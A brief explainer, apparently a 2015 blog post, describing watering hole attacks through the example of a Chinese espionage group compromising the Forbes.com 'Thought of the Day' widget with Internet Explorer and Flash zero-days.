Watering hole attacks were in the news earlier this year (2015) after a Chinese cyber espionage group successfully compromised several major US financial services and defense industry companies. The attack sprang from malicious code injected into www.forbes.com’s ‘Thought of the Day’ widget, which is a flash pop-up users see upon visiting the Forbes.com home page.
The group exploited two zero-day vulnerabilities, one in Microsoft’s Internet Explorer and the other in Adobe’s Flash Player – both have since been fixed by Microsoft and Adobe.
The forbes.com example is a classic, ‘watering hole’ drive-by attack. The premise of the watering hole attack is simple: identify a place – online or in the real world – where members of a community gather and then poison that place. Once the place is ‘poisoned’ the hackers are then able to exploit vulnerabilities by injecting malware into those visiting that place.
In the physical world, a watering hole attack might be something like setting up a fake, free wifi service at a coffee shop where employees of a target company often go.
In the Forbes attack, the watering hole was their flash ‘thought of the day’ widget that many people in the financial services and defense industry see because they are so apt to visit www.forbes.com.
Simple, classic and dangerous.